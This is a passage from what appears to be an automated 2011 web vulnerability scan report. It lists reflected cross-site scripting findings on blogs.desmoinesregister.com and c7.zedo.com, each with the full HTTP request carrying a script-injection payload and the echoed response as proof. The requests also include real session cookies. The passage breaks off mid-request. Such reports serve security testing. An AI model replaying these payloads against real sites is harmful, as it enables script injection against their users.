The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dfeb"><script>alert(1)</script>1d5781cdb1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js3dfeb"><script>alert(1)</script>1d5781cdb1?ver=1.3.0 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69887

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js3dfeb"><script>alert(1)</script>1d5781cdb1" />
...[SNIP]...

1.122. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dda02"%3balert(1)//835bdff0c58 was submitted in the REST URL parameter 6. This input was echoed as dda02";alert(1)//835bdff0c58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.jsdda02"%3balert(1)//835bdff0c58?ver=1.3.0 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69815

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
cript'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.jsdda02";alert(1)//835bdff0c58","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.123. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/wp-email/email-css.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/wp-email/email-css.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51ec4"%3balert(1)//2ac9bdf6711 was submitted in the REST URL parameter 5. This input was echoed as 51ec4";alert(1)//2ac9bdf6711 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/wp-email/email-css.css51ec4"%3balert(1)//2ac9bdf6711?ver=2.50 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:34:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69390

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
uires:[],
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr/wp-content/plugins/wp-email/email-css.css51ec4";alert(1)//2ac9bdf6711","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.124. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/wp-email/email-css.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/wp-email/email-css.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e743e"><script>alert(1)</script>045c9ac9fe9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/wp-email/email-css.csse743e"><script>alert(1)</script>045c9ac9fe9?ver=2.50 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:34:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69466

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmr/wp-content/plugins/wp-email/email-css.csse743e"><script>alert(1)</script>045c9ac9fe9" />
...[SNIP]...

1.125. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4b81"%3balert(1)//ea5f78fe07a was submitted in the REST URL parameter 6. This input was echoed as d4b81";alert(1)//ea5f78fe07a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /odygel/lib/legacy/GDN/UAWidgets/LoggedOut.jsd4b81"%3balert(1)//ea5f78fe07a HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; SiteLifeHost=gnvm25l3pluckcom

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:36:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69717

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
quires:[],
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.jsd4b81";alert(1)//ea5f78fe07a","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.126. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 291b0"><script>alert(1)</script>9616e98d8c6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js291b0"><script>alert(1)</script>9616e98d8c6 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; SiteLifeHost=gnvm25l3pluckcom

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:36:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69793

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js291b0"><script>alert(1)</script>9616e98d8c6" />
...[SNIP]...

1.127. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/login.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /odygel/lib/userauth/content/login.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60f8e"><script>alert(1)</script>917b1fb18f2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /odygel/lib/userauth/content/login.html60f8e"><script>alert(1)</script>917b1fb18f2 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; s_cc=true; s_sq=%5B%5BB%5D%5D; SiteLifeHost=gnvm25l3pluckcom

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:38:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69767

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/odygel/lib/userauth/content/login.html60f8e"><script>alert(1)</script>917b1fb18f2" />
...[SNIP]...

1.128. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/login.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /odygel/lib/userauth/content/login.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36671"%3balert(1)//1caaebcb5b0 was submitted in the REST URL parameter 5. This input was echoed as 36671";alert(1)//1caaebcb5b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /odygel/lib/userauth/content/login.html36671"%3balert(1)//1caaebcb5b0 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; s_cc=true; s_sq=%5B%5BB%5D%5D; SiteLifeHost=gnvm25l3pluckcom

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:38:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69691

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...

       requires:[],
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/odygel/lib/userauth/content/login.html36671";alert(1)//1caaebcb5b0","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.129. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/signup.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /odygel/lib/userauth/content/signup.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fc42"%3balert(1)//d198b406e30 was submitted in the REST URL parameter 5. This input was echoed as 9fc42";alert(1)//d198b406e30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /odygel/lib/userauth/content/signup.html9fc42"%3balert(1)//d198b406e30 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; s_cc=true; s_sq=%5B%5BB%5D%5D; SiteLifeHost=gnvm25l3pluckcom

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:38:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69695

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...

       requires:[],
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/odygel/lib/userauth/content/signup.html9fc42";alert(1)//d198b406e30","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.130. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/signup.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /odygel/lib/userauth/content/signup.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d94d8"><script>alert(1)</script>8108b2c0f8b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /odygel/lib/userauth/content/signup.htmld94d8"><script>alert(1)</script>8108b2c0f8b HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; s_cc=true; s_sq=%5B%5BB%5D%5D; SiteLifeHost=gnvm25l3pluckcom

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:38:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69771

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/odygel/lib/userauth/content/signup.htmld94d8"><script>alert(1)</script>8108b2c0f8b" />
...[SNIP]...

1.131. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14989'%3balert(1)//2a3dc6422b2 was submitted in the $ parameter. This input was echoed as 14989';alert(1)//2a3dc6422b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=2942/2941/1&a=0&f=&n=305&r=13&d=9&q=&$=14989'%3balert(1)//2a3dc6422b2&s=916&l=http%3A//media2.legacy.com/adlink/5306/1804573/0/170/AdId%3D1437456%3BBnId%3D1%3Bitime%3D646950193%3Bnodecode%3Dyes%3Blink%3D&z=0.16725402581505477 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:14989';alert(1)//2a3dc6422b2;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,2942,9:305,4506,17:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=64
Expires: Mon, 14 Feb 2011 01:30:24 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 4248

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=916;var zzPat=',14989';alert(1)//2a3dc6422b2';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,14989';alert(1)//2a3dc6422b2;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.132. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e66f0"%3balert(1)//c0290daf8fd was submitted in the $ parameter. This input was echoed as e66f0";alert(1)//c0290daf8fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=2942/2941/1&a=0&f=&n=305&r=13&d=9&q=&$=e66f0"%3balert(1)//c0290daf8fd&s=916&l=http%3A//media2.legacy.com/adlink/5306/1804573/0/170/AdId%3D1437456%3BBnId%3D1%3Bitime%3D646950193%3Bnodecode%3Dyes%3Blink%3D&z=0.16725402581505477 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; 